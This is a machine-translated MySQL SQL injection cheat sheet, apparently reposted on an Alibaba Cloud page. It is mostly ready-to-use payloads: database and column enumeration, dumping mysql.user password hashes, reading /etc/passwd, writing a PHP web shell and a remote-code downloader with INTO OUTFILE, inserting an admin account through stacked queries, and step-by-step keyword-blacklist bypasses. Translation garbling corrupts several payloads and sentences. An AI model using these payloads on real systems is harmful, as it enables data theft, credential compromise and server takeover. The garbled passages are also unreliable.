MySQL Inject science

Source: Internet
Author: User
Tags benchmark mysql query sql injection file permissions hex code

The database that exists by default:
Mysql Requires root permission to read
Information_schema exists in more than 5 versions
Test for the presence of an injection method

False: Indicates that the query is wrong (MySQL error/Return page is different from the original)

True: Indicates that the query is normal (the return page is the same as the original)

A total of three cases:

when querying for string types: when a numeric type is queried: when landing:
False
‘‘ Really
" False
"" Really
\ False
\\ Really
and 1 Really
and 0 False
and true Really
and false False
1-false Return 1 results when there is a problem
1-true Return 0 results when there is a problem
2-1 Returns the same representation as 1 may be problematic
1*56 Returns the same representation as 56 may be problematic
1*56 Return with 1 same rep no problem
' OR ' 1
' OR 1---
"OR" "="
"OR 1 = 1---
=
' Like '
' =0--+

Example:

SELECT * FROM Users WHERE id = ' 1 '; SELECT * FROM Users WHERE id = 3-2; SELECT * from Users WHERE username = ' Mike ' and password = ' OR ' = ';

You can use a lot of single and double quotes, as long as they appear in pairs.

SELECT * FROM articles WHERE id = ' 121 ' "" "

The statement after the quotation marks will continue to execute.

Select ' 1 ' "" "" UNION Select ' 2 ' # 1 and 2

The following symbols can be used to annotate statements:

# Hash syntax
/* C-style syntax
-- - SQL syntax
;%0 0 Empty bytes
` Anti-Quote

Example:

SELECT * from Users WHERE username = ' OR 1=1---' and password = '; SELECT * FROM Users WHERE id = ' UNION SELECT 1, 2, 3 ';
Test database version
VERSION () @ @VERSION @ @GLOBAL. VERSION

If the version is 5, the following example returns to true:

SELECT * FROM Users WHERE id = ' 1 ' and MID (VERSION (), 1, 1) = ' 5 ';

The MySQL query on the Windows platform differs from the one returned on Linux if the Windows Server returns results that contain-nt-log characters.

Database authentication information:
Table Mysql.user
Field User, password
Current user User (), Current_User (), Current_User, System_user (), Session_user ()

Example:

SELECT Current_User; SELECT Concat_ws (0x3A, user, password) from mysql.user WHERE user = ' root '--(privileged)
Database name:
Table Information_schema.schemata, Mysql.db
Field Schema_name, DB
Current database Database (), schema ()

Example:

SELECT database (); SELECT schema_name from Information_schema.schemata; SELECT DISTINCT (db) from mysql.db;--(privileged)
Server Host Name:
@ @HOSTNAME

Example:

SELECT @ @hostname;
Number of table and field detection fields

Two different ways:

ORDER by judgment ORDER by N+1; Let n continue to increase until the error page appears. Example: Query statement SELECT username, password, permission from Users WHERE id = ' 1 '; 1 ' ORDER by 1--+ true 1 ' ORDER by 2--+ true 1 ' ORDER by 3--+ true 1 ' ORDER by 4--+ false-query uses only 3 fields-1 ' UNION SELECT 1,2,3--+ True
Based on Error query and (SELECT * from some_existing_table) = 1 Note: This method requires you to know the name of the table you want to query. This error method returns the number of fields in the table, not the wrong query statement. Example: Query statement SELECT permission from Users WHERE id = 1; and (SELECT * from Users) = 1 Returns the number of fields for users
Query table name

Three different ways:

Union mode UNION SELECT GROUP_CONCAT (table_name) from Information_schema.tables WHERE version=10;--MySQL 4 version with Version=9,mysql 5 version with version=10
Blind note and SELECT SUBSTR (table_name,1,1) from Information_schema.tables > ' A '
Error and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP by CONCAT (SELECT table_name from information _schema.tables LIMIT 1), Floor (RAND (0))) (@:=1) | | @ GROUP by CONCAT ((SELECT table_name from Information_schema.tables LIMIT 1), [email protected]) have @| | MIN (@:=0); and Extractvalue (1, CONCAT (0X5C, (SELECT table_name from information_schema.tables LIMIT 1));--Success in version 5.1.5.
Query Column Name
Union mode UNION SELECT Group_concat (column_name) from information_schema.columns WHERE table_name = ' tablename '
Blind note and SELECT SUBSTR (column_name,1,1) from Information_schema.columns > ' A '
Error and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP by CONCAT (select column_name from Informatio N_schema.columns LIMIT 1), Floor (RAND (0))) (@:=1) | | @ GROUP by CONCAT ((SELECT column_name from Information_schema.columns LIMIT 1), [email protected]) have @| | MIN (@:=0); and Extractvalue (1, CONCAT (0x5c, (SELECT column_name from Information_schema.columns LIMIT 1));--Success in version 5.1.5. and (+/-) = (SELECT * from some_existing_table UNION select LIMIT 1)--MySQL version 5.1 fixed
Using procedure analyse () This requires a web presence page with a field for the query you've injected. Example: Query statement SELECT username, permission from Users WHERE id = 1; 1 PROCEDURE analyse () get the first segment name 1 limit PROCEDURE analyse () get the second segment name 1 limit 2,1 PROCEDURE analyse () get a third segment name
Querying more than one table or column at a time
Select (@) from (select (@:=0x00), (select (@) from (information_schema.columns) WHERE (table_schema>[ Email protected]) and (@) in (@:=concat (@,0x0a, ' [', Table_schema, '] > ', table_name, ' > ', column_name))) x

Example:

SELECT * from the Users WHERE id = '-1 ' UNION select 1, 2, (select (@) from (select (@:=0x00), (select (@) from (Information_sch Ema.columns) WHERE (table_schema>[ Email protected]) and (@) in (@:=concat (@,0x0a, ' [', Table_schema, '] > ', table_name, ' > ', column_name)))) x), 4--+ ';

Output Result:

[Information_schema] >character_sets > Character_set_name [information_schema] >character_sets > DEFAULT_ Collate_name [Information_schema] >character_sets > DESCRIPTION [information_schema] >character_sets > MAX LEN [Information_schema] >collations > collation_name [information_schema] >collations > CHARACTER_SET_NAM  E [Information_schema] >collations > ID [information_schema] >collations > Is_default [information_schema ] >collations > is_compiled

Using code:

SELECT MID (Group_concat (0x3c62723e, 0X5461626C653A20, TABLE_NAME, 0x3c62723e, 0X436F6C756D6E3A20, column_name ORDER by (SELECT version from Information_schema.tables) SEPARATOR 0x3c62723e), 1,1024) from Information_schema.columns

Example:

Select username from Users WHERE id = '-1 ' UNION SELECT MID (Group_concat (0x3c62723e, 0X5461626C653A20, TABLE_NAME, 0x3c627 23e, 0X436F6C756D6E3A20, column_name ORDER by (SELECT version from information_schema.tables) SEPARATOR 0x3c62723e), 1,1024) from Information_schema.columns;

Output Result:

Table:talk_revisionsColumn:revidTable:talk_revisionsColumn:useridTable:talk_revisionsColumn:userTable:talk_ Projectscolumn:priority
The table where the query is based on the column name
SELECT table_name from information_schema.columns WHERE column_name = ' username '; Query field username table
SELECT table_name from Information_schema.columns WHERE column_name like '%user% '; Table with user in the query field
Fields that are included based on a table query
SELECT column_name from information_schema.columns WHERE table_name = ' Users '; Querying fields in the user table
SELECT column_name from Information_schema.columns WHERE table_name like '%user% '; Query contains fields from the User string table
Bypass Quote Limit
SELECT * from Users WHERE username = 0x61646d696e Hex Code
SELECT * from Users WHERE username = CHAR (97, 100, 109, 105, 110) Take advantage of the char () function
Bypass String blacklist
SELECT ' A ' d ' mi ' n ';
SELECT CONCAT (' A ', ' d ', ' m ', ' I ', ' n ');
SELECT concat_ws (', ' a ', ' d ', ' m ', ' I ', ' n ');
SELECT group_concat (' A ', ' d ', ' m ', ' I ', ' n ');

When using concat (), any parameter is NULL, NULL is returned, and CONCAT_WS () is recommended.

The first parameter of the CONCAT_WS () function indicates which character interval is used to query the result.

Conditional statements
Case
IF ()
Ifnull ()
Nullif ()

Example:

SELECT IF (1=1, True, false); SELECT case is 1=1 then true ELSE false END;
Time Delay query:
SLEEP () MySQL 5
BENCHMARK () MySQL 4/5

Example:

'-(IF (Version (), () like 5, BENCHMARK (100000,SHA1 (' true ')), false))-'
Permissions file Permissions

The following statement can query the user read and write file operation permissions:

SELECT File_priv from mysql.user WHERE user = ' username '; Requires root user to execute MySQL 4/5
SELECT grantee, is_grantable from information_schema.user_privileges WHERE privilege_type = ' file ' and grantee like '%user Name% '; Ordinary users can MySQL 5
Read file

If the user has file manipulation permissions to read the file:

Load_file ()

Example:

SELECT load_file ('/etc/passwd '); SELECT Load_file (0x2f6574632f706173737764);
    • The file must be on the server.
    • The current directory of the Load_file () function action file is @ @datadir.
    • The MySQL user must have permission to read this file.
    • The file size must be less than max_allowed_packet.
    • The default size of @ @max_allowed_packet is 1047552 bytes.
Write a file

If the user has file manipulation permissions, the file can be written.

Into Outfile/dumpfile

Write a shell for PHP:

SELECT ' <? System ($_get[\ ' c\ ');?> ' into OUTFILE '/var/www/shell.php ';

Visit the following link:

http://localhost/shell.php?c=cat%20/etc/passwd

Write a download by:

SELECT ' <? Fwrite (fopen ($_get[f], \ ' w\ '), file_get_contents ($_get[u]));?> ' into OUTFILE '/var/www/get.php '

Visit the following link:

Http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

    • Into OUTFILE can not overwrite files that already exist.
    • Into OUTFILE must be the last query.
    • Quotation marks are necessary because there is no way to encode the pathname.
PDO heap Query mode operation database

PHP uses Pdo_mysql to connect to a database and can use heap queries, which can execute multiple statements at the same time.

SELECT * from Users WHERE id=1 and 1=0; INSERT into Users (username,password,priv) VALUES (' Bobbytables ', ' kl20da$$ ', ' admin ');
MySQL-specific notation

In MySQL,/*! SQL statements * * The SQL statements in this format are parsed as normal statements.

If there is a string followed by a number (this string is the version number of the MySQL database), such as:/*! 12345 SQL Statement */

When the version number is greater than or equal to the number, the SQL statement executes, otherwise it is not executed.

SELECT 1/*!41320union/*!/*!/*!00000select/*!/*! user/*! (/*!/*!/*!*/);
Blur and confuse allowed characters
09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
A0 Non-breaking Space
20 Space

Example:

'%0a%09union%0cselect%a0null%20%23

Parentheses can also be used to bypass filtering of whitespace:

28 (
29 )

Example:

UNION (SELECT (column) from (table))
Characters that can be followed by and OR or
20 Space
2 b +
The -
7E ~
21st !
40 @

Example:

SELECT 1 from dual WHERE 1=1 and-+-+-+-+~~ ((1))

Dual is a virtual table that can be used for testing.

Several examples of blacklist bypass based on the keyword blacklist
Filter keywords And OR
PHP code Preg_match ('/(and|or)/I ', $id)
The attack code that will be filtered 1 or 1=1 1 and 1=1
Bypass mode 1 | | 1=1 1 && 1=1

Here's how you need to know some table and field names (you can use the SUBSTRING function to get the data from a information_schema.columns table)

Filter keywords and OR union
PHP code Preg_match ('/(and|or|union)/I ', $id)
The attack code that will be filtered Union Select User,password from Users
Bypass mode 1 && (select User from users where userid=1) = ' admin '
Filter keywords and or union where
PHP code Preg_match ('/(and|or|union|where)/I ', $id)
The attack code that will be filtered 1 && (select User from users where user_id = 1) = ' admin '
Bypass mode 1 && (select User from users limit 1) = ' admin '
Filter keywords and or union where
PHP code Preg_match ('/(and|or|union|where)/I ', $id)
The attack code that will be filtered 1 && (select User from users where user_id = 1) = ' admin '
Bypass mode 1 && (select User from users limit 1) = ' admin '
Filter keywords And, or, union, where, limit
PHP code Preg_match ('/(and|or|union|where|limit)/I ', $id)
The attack code that will be filtered 1 && (select User from users limit 1) = ' admin '
Bypass mode 1 && (select User from Users group by user_id have user_id = 1) = ' admin ' #user_id聚合中user_id为1的user为admin
Filter keywords And, or, union, where, limit, group by
PHP code Preg_match ('/(and|or|union|where|limit|group by)/I ', $id)
The attack code that will be filtered 1 && (select User from Users group by user_id have user_id = 1) = ' admin '
Bypass mode 1 && (select substr (Group_concat (user_id), 1) user from users) =
Filter keywords And, or, union, where, limit, group by, select
PHP code Preg_match ('/(And|or|union|where|limit|group by|select)/I ', $id)
The attack code that will be filtered 1 && (select substr (Gruop_concat (user_id), 1) user from users) =
Bypass mode 1 && substr (user,1,1) = ' a '
Filter keywords And, or, union, where, limit, group by, select, '
PHP code Preg_match ('/(And|or|union|where|limit|group by|select|\ ')/I ', $id)
The attack code that will be filtered 1 && (select substr (Gruop_concat (user_id), 1) user from users) =
Bypass mode 1 && user_id is not null 1 && substr (user,1,1) = 0x61 1 && substr (user,1,1) = Unhex (61)
Filter keywords And, or, union, where, limit, group by, select, ', Hex
PHP code Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex)/I ', $id)
The attack code that will be filtered 1 && substr (user,1,1) = Unhex (61)
Bypass mode 1 && substr (user,1,1) = Lower (conv (11,10,16)) #十进制的11转化为十六进制, and lowercase.
/tr>
filter keyword and, or, union, where, limit, group by, select, ', Hex, substr
PHP code Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex|substr)/I ', $id)
will filter the attack code 1 && substr (user,1,1) = Lower (conv (11,10,16))/td>
Bypass Mode 1 && lpad (user,7,1)
Filter keywords And, or, union, where, limit, group by, select, ', Hex, substr, Space
PHP code Preg_match ('/(And|or|union|where|limit|group by|select|\ ' |hex|substr|\s)/I ', $id)
The attack code that will be filtered 1 && lpad (user,7,1)/td>
Bypass mode 1%0b| |%0 Blpad (user,7,1)
Filter keywords and or union where
PHP code Preg_match ('/(and|or|union|where)/I ', $id)
The attack code that will be filtered 1 | | (Select User from users where user_id = 1) = ' admin '
Bypass mode 1 | | (Select User from users limit 1) = ' admin '
Using regular expressions to make blind bets

As we all know, in MySQL 5+, all the library names, indicating and field name information are stored in the INFORMATION_SCHEMA library. The attack mode is as follows:

1. Determine if the first character of the first table name is a A-Z character, where Blind_sqli is the assumed known library name.

Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- Z] ' LIMIT 0,1)/*

2. Determine if the first character is a character in A-n

Index.php?id=1 and 1= (select 1 from information_schema.tables  WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a-n] ' LIMIT 0,1)/*

3. Determine that the character is n

Index.php?id=1 and 1= (select 1 from information_schema.tables  WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^n ' LIMIT 0,1)/*

4, the expression is replaced as follows

At this point the table name is news, to verify that the regular expression is ' ^news$ ', but it is not necessary to directly judge table_name = ' news ' is OK.

5, next guess to solve the other table only need to modify limit 2,1 limit, you can be the next table blind note.

Injection after ORDER BY

oder by because it is a sort statement, you can use conditional statements to make judgments, according to the results of the return of the order of different judging conditions of true and false.

It is possible that a variable with a oder or an out-of-the-way can be injected in the following ways when you know a field:

Original link: Http://www.test.com/list.php?order=vote is sorted according to the vote field.

Find the largest number of votes num then construct the following link:

Http://www.test.com/list.php?order=abs (vote-(User ()) >0) *num) +ASC

See if the sort changes.

There is also a method that does not need to know any field information, using the RAND function:

Http://www.test.com/list.php?order=rand (True) Http://www.test.com/list.php?order=rand (false)

The above two returns a different sort, and the statement that determines whether the first character in the table name is less than 128 is as follows:

Http://www.test.com/list.php?order=rand ((select char (substring (table_name,1,1)) from Information_schema.tables Limit 1) <=128))
Wide byte injection

The most commonly used GBK encoding in SQL injection is the one that bypasses the transfer of special characters such as Addslashes. The Hex of the backslash () is%5c, and when you enter%bf%27, the function encounters a single quote auto-transfer join \, at which point the%bf%5c%27,%bf%5c becomes a wide character "縗" in GBK. %BF that position can be any character in the middle of the%81-%fe. Wide character injection can be applied in many places, not just in SQL injection.

MySQL Inject science

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.